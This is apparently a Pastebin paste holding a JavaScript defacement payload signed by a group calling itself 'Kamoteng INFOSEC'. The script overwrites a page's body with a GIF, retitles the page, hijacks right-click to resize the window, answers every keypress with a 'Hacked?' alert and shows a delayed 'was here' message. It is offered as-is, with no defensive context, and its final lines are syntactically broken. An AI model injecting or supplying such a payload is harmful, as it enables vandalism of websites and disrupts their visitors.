Advertisement
Guest User

Untitled

a guest
May 22nd, 2019
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.78 KB | None | 0 0
  1. document.getElementsByTagName('body')[0].innerHTML="<img src='https://media.giphy.com/media/9WC8WTZsFxkRi/giphy.gif'>"
  2. document.title="Kamoteng INFOSEC"
  3. function muter2(){
  4. scrW=screen.availWidth
  5. scrH=screen.availHeight
  6. window.moveTo(0,0)
  7. window.resizeTo(10,10)
  8. window.focus()
  9. for(x=0;x<80;x++){
  10. window.resizeTo(10,scrH*x/80)
  11. }
  12. for(y=0;y<80;y++){
  13. window.resizeTo(scrW*y/80,scrH)
  14. }
  15. window.resizeTo(scrW,scrH)
  16. }
  17. document.oncontextmenu=new Function("muter2();return false");
  18. function keypressed(){alert("Hacked?");}
  19. document.onkeydown=keypressed;
  20. function kasih_tau(){
  21. alert('kamote');
  22. }
  23. if(location.href.indexOf('kamote.blogspot.com')==-1)setTimeout("alert('Kamoteng INFOSEC was here');",3000);
  24. else setTimeout("kasih_tau()",3000);
  25. if(navigator.userAgent.indexOf('MSIE')!=-1)
  26. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement